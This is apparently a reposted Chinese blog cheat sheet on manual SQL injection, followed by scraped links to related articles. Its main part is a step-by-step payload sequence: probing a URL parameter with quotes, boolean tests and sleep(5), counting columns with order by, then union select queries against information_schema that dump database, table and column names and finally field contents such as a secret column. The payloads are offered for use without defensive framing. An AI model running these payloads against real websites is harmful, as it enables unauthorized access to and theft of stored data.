查找注入点
在url中:
1. '
2. and 1=1/and 1=2
3. 随即输入(整形)
4. -1/+1回显上下页面(整形)
5. and sleep(5) (判断页面返回时间)
判断有多少列
order by .....
爆显示位
id=88888888') union select 1,2,3 --+
先获取数据库:
id=')  union select 1,2,group_concat(distinct+table_schema) from information_schema.columns  --+
再获取数据库的所有表:
id=') union select 1,2,group_concat(distinct+table_name) from information_schema.columns where table_schema='库名' --+
再获取表中的字段:
id=')  union select 1,2,group_concat(distinct+column_name) from information_schema. columns where table_name='表名' --+
再获取字段信息
id=')  union select 1,2,group_concat(id,sessid,secret_EXS6,tryy) from 库名.表名--+

转载于:https://www.cnblogs.com/sky--/p/5761748.html

sql注入基于错误-单引号-字符型相关推荐

  1. SQL注入——基于联合查询的字符型GET注入(三)

    本章目的 普及字符型GET注入的原理和特点,掌握利用联合查询(unionselect)的方法实现SQL注入的基本流程. 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 ( ...

  2. SQL注入——基于报错的注入(五)

    本章目的 普及报错功能函数extractvalue()的用法,演示基于报错的SQL注入基本流程. 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件:S ...

  3. 【less-11】基于SQLI的POST字符型SQL注入

    实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLI的POST字符型SQL注入 实验目的 实验环境 实验原理 实验步骤 第一步 判断是够存在POST型注入点 ...

  4. 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

    0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...

  5. SQL注入——基于时间的盲注(九)

    本章目的 普及延时盲注技术的运用场景及条件,熟悉length().Substr().ascii().sleep().if()等函数的用法,掌握基于时间的盲注基本流程.PS:面试问答不深问就回答延迟 基 ...

  6. SQL注入——基于布尔的盲注(八)

    本章目的 普及布尔盲注技术的运用场景及条件,熟悉length().substr().ascii()等函数的用法,掌握基于布尔的盲注基本流程.PS:面试回答主要为对错论 基本概念 盲注 在SQL注入过程 ...

  7. sql中插入带有单引号的数据

    字符串数据是用单引号包在外面的,如果插入的数据中包含单引号,就需要再做处理 可以将单引号替换成两个单引号,在sql中连续两个单引号就表示一个单引号字符 举例如下: insert into A(a1,a ...

  8. 解决特殊字符引起json解析错误--单引号、双引号转义

    解决特殊字符引起json解析错误–单引号.双引号转义 这几天在做一个题库管理,遇到了一个问题,将后台的json数据传到前台用parse解析时,出现了一个错误: Uncaught SyntaxError ...

  9. SQL中的五种数据类型:字符型,文本型,数值型,逻辑型和日期型

    简要描述一下SQL中的五种数据类型:字符型,文本型,数值型,逻辑型和日期型 字符型 VARCHAR VS CHAR VARCHAR型和CHAR型数据的这个差别是细微的,但是非常重要.他们都是用来储存字 ...

最新文章

  1. 我潜入清华神秘实验室,用脑机接口写了两句诗
  2. 20165224 陆艺杰 网络攻防 实验1
  3. 混合模式程序集是针对“v2.0.50727”版的运行时生成的,在没有配置其他信息的情况下,无法在 4.0 运行时中加载该程序集...
  4. android8.1自定义通知栏,Android 8.1隐藏状态栏图标的实例代码
  5. 如何利用PHP会话显示出当前在线的用户
  6. Flink 小贴士 (7): 4个步骤,让 Flink 应用达到生产状态
  7. memcached高速缓存学习笔记003---利用JAVA程序操作memcached crud操作
  8. find命令用法集锦
  9. Unity3D游戏开发之仿仙剑奇侠传一2D游戏 (一)
  10. git回退到历史版本并提交到远程分支
  11. Matplotlib简介和pyplot的简单使用——subplot
  12. java插件已崩溃怎么处理_java.lang.IllegalArgumentException:插件已初始化
  13. pip安装时ReadTimeoutError解决办法
  14. java工程师简历例子_Java开发工程师简历优秀简历(50份)
  15. dstwo linux 模拟器,dstwo gba 模拟器-TempGBA下载V1.44 最新版-西西游戏下载
  16. Inspinia的version 2.4模板使用的谷歌字体加载很慢问题解决
  17. 【傻瓜教程】手把手教你安装pip
  18. JS+html+css实现的一个小小的贪吃蛇游戏
  19. 程序员学习资料分享---爱分享的程序员(新浪微博)
  20. jscript php,PHP, JScript和VBScript函数和类的语法

热门文章

  1. python print 输出到txt_(Python基础教程之七)Python字符串操作
  2. OpenCV_01 简介+无版权安装+模块分析
  3. ssh 端口_【科普】SSH都不懂,还搞什么网络
  4. python 自定义类(特殊方法)
  5. Paddle 使用预训练模型 实现快递单信息抽取
  6. LintCode 1917. 切割剩余金属
  7. LeetCode 352. 将数据流变为多个不相交区间(map二分查找)
  8. 03.结构化机器学习项目 W2.机器学习策略(2)
  9. LeetCode 966. 元音拼写检查器(哈希)
  10. LeetCode 638. 大礼包(无限背包DP)